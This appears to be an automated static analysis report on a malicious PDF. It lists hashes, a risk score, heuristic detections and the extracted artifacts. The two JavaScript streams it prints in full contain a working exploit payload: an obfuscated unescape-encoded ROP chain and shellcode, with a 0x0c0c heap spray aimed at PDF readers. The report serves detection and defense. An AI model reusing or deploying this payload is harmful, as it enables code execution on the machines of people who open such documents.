Malicious PDF — malware analysis report

Static analysis result for SHA-256 9e74a262a9502d97…

MALICIOUS

PDF

53.4 KB First seen: 2026-05-11
MD5: cdda66af601166bfe64edb26faa85ac6 SHA-1: ec79fa1b9fcb498c7264cb55ec1ecea409190753 SHA-256: 9e74a262a9502d97e850f6d0be86a64214b1605f5b6dd2ec3fa197c54af01c0c
76 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 3678 bytes
SHA-256: 01a5abc81f56eebfc76fcab7f4fb8a210d1641e74d1385a6c6723e917a7a7921
Detection
ClamAV: No threats found
Obfuscation or payload: likely
8 of 12 identifiers look randomly generated (e.g. 'rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsd') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var TNhBPyppNigTiKI = unescape;
var TzhLxhODrXtyqHjSMWjZFRVHUiQwsloWsQNsfFjcTEomVrzQXtYqvOaUuMQCWoWzkXXT = TNhBPyppNigTiKI( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc931%u49b1%u9ebf%u483f%udbcf%ud9cb%u2474%u5af4%uea83%u31fc%u0c7a%u7a03%u7c0c%ub4ca%u0927%u4535%u69b8%ua0bf%ubb89%ua1db%u0bb8%ue4af%ue030%u1cfd%u84c2%u1229%u2263%u1d0c%u8374%uf190%u82b6%u086c%u64eb%uc34c%u65fe%u3e89%u37f0%u3442%ua7a3%u08e7%uc678%u0727%ub0c0%ud842%u0ab5%u094c%u0165%ub106%u4d0d%uc0b7%u8ec2%u8b8b%u646f%u0a7f%ub5a6%u3c80%u1986%uf0bf%u600b%u3787%u17f4%u4bf3%u2f89%u36c0%uba55%u91d5%u1c1e%u233e%ufaf2%u2fb5%u89bf%u3392%u5e3e%u48a9%u61cb%ud97e%u458f%u815a%ue454%u6ffb%u193a%ud71b%ubfe3%ufa57%ub9f0%u9335%uf735%u63c5%u8052%u51b6%u3afd%uda51%ue476%u1da6%u50ad%ue038%ua04e%u2710%uf01a%u8e0a%u9b23%u2fca%u0bf6%u9f9b%ueba9%u604b%u831a%u6f81%ub345%ua5a9%u59ee%u2e53%u35d1%u865b%u47b9%uc75c%uce65%u8dba%u8685%u3a15%u833f%udbee%u1ec0%udc8b%uac4b%u926b%ud9bb%u437f%u944c%uc222%u0353%ueb48%uafc1%ubcdb%uad7d%u8a3a%u4e21%u8069%udae8%uffd2%u0a14%uffd3%u4042%u97d3%u3032%u8280%ued3c%u1eb4%u0da9%uf3ed%u657a%u2d13%u2a4c%u18ec%u174c%u653b%u61ca%u8549%u4116' );
var reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD = TNhBPyppNigTiKI( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD.length + 20 + 8 < 65536) reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD+=reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD;
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK = reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD.substring(0, (0x0c0c-0x24)/2);
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK += TzhLxhODrXtyqHjSMWjZFRVHUiQwsloWsQNsfFjcTEomVrzQXtYqvOaUuMQCWoWzkXXT;
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK += reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD;
wEFbWkDcjXZgGINgdfgfGGlr = AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK.substring(0, 65536/2);
while(wEFbWkDcjXZgGINgdfgfGGlr.length < 0x80000) wEFbWkDcjXZgGINgdfgfGGlr += wEFbWkDcjXZgGINgdfgfGGlr;
DaexgGPlJFkbBzGVFHuhSMwqhaCyDKYyfJgIjTkGOenwPu = wEFbWkDcjXZgGINgdfgfGGlr.substring(0, 0x80000 - (0x1020-0x08) / 2);
var pHMaElvSNjakspOdyMsrtBFMaJEGzclUekCfWkhBhGilBeulLklgiBaMAXNiFLUGhVbSg = new Array();
for (rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb=0;rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb<0x1f0;rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb++) pHMaElvSNjakspOdyMsrtBFMaJEGzclUekCfWkhBhGilBeulLklgiBaMAXNiFLUGhVbSg[rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb]=DaexgGPlJFkbBzGVFHuhSMwqhaCyDKYyfJgIjTkGOenwPu+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4564 bytes
SHA-256: bb97093eb02e4c7fe5a5204fe7ca9d4d0ee33d1ed6e9fadf85518debc41c9e73
Preview script
First 1,000 lines of the extracted script
var TNhBPyppNigTiKI = unescape;
var TzhLxhODrXtyqHjSMWjZFRVHUiQwsloWsQNsfFjcTEomVrzQXtYqvOaUuMQCWoWzkXXT = TNhBPyppNigTiKI( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc931%u49b1%u9ebf%u483f%udbcf%ud9cb%u2474%u5af4%uea83%u31fc%u0c7a%u7a03%u7c0c%ub4ca%u0927%u4535%u69b8%ua0bf%ubb89%ua1db%u0bb8%ue4af%ue030%u1cfd%u84c2%u1229%u2263%u1d0c%u8374%uf190%u82b6%u086c%u64eb%uc34c%u65fe%u3e89%u37f0%u3442%ua7a3%u08e7%uc678%u0727%ub0c0%ud842%u0ab5%u094c%u0165%ub106%u4d0d%uc0b7%u8ec2%u8b8b%u646f%u0a7f%ub5a6%u3c80%u1986%uf0bf%u600b%u3787%u17f4%u4bf3%u2f89%u36c0%uba55%u91d5%u1c1e%u233e%ufaf2%u2fb5%u89bf%u3392%u5e3e%u48a9%u61cb%ud97e%u458f%u815a%ue454%u6ffb%u193a%ud71b%ubfe3%ufa57%ub9f0%u9335%uf735%u63c5%u8052%u51b6%u3afd%uda51%ue476%u1da6%u50ad%ue038%ua04e%u2710%uf01a%u8e0a%u9b23%u2fca%u0bf6%u9f9b%ueba9%u604b%u831a%u6f81%ub345%ua5a9%u59ee%u2e53%u35d1%u865b%u47b9%uc75c%uce65%u8dba%u8685%u3a15%u833f%udbee%u1ec0%udc8b%uac4b%u926b%ud9bb%u437f%u944c%uc222%u0353%ueb48%uafc1%ubcdb%uad7d%u8a3a%u4e21%u8069%udae8%uffd2%u0a14%uffd3%u4042%u97d3%u3032%u8280%ued3c%u1eb4%u0da9%uf3ed%u657a%u2d13%u2a4c%u18ec%u174c%u653b%u61ca%u8549%u4116' );
var reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD = TNhBPyppNigTiKI( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD.length + 20 + 8 < 65536) reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD+=reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD;
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK = reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD.substring(0, (0x0c0c-0x24)/2);
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK += TzhLxhODrXtyqHjSMWjZFRVHUiQwsloWsQNsfFjcTEomVrzQXtYqvOaUuMQCWoWzkXXT;
AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK += reMPIQckOnXAsdRplsDyRphnmNnPEYGhsGaliNbLRBSfIlHAFuD;
wEFbWkDcjXZgGINgdfgfGGlr = AqqgrMDkbQCJNILkYItIuUxKeYiDRBkXINeK.substring(0, 65536/2);
while(wEFbWkDcjXZgGINgdfgfGGlr.length < 0x80000) wEFbWkDcjXZgGINgdfgfGGlr += wEFbWkDcjXZgGINgdfgfGGlr;
DaexgGPlJFkbBzGVFHuhSMwqhaCyDKYyfJgIjTkGOenwPu = wEFbWkDcjXZgGINgdfgfGGlr.substring(0, 0x80000 - (0x1020-0x08) / 2);
var pHMaElvSNjakspOdyMsrtBFMaJEGzclUekCfWkhBhGilBeulLklgiBaMAXNiFLUGhVbSg = new Array();
for (rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb=0;rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb<0x1f0;rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb++) pHMaElvSNjakspOdyMsrtBFMaJEGzclUekCfWkhBhGilBeulLklgiBaMAXNiFLUGhVbSg[rQfeQRcRKScmOWGZLatxrjjlxKtOAfwHzmSrLlsdmwFkiuDUSFtovpLelTIhvFzJwCEQmnRtShbKijjdKgSacMGJOmXwPMfjjZSb]=DaexgGPlJFkbBzGVFHuhSMwqhaCyDKYyfJgIjTkGOenwPu+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000053844 00000 n
0000053877 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54363
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: 076f5d08d54075a696ecd7eeb7f597aa8c84c22bc13d2d943beebbfd7e4afdd9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C

Open this report in the interactive analyzer, or submit your own file for analysis.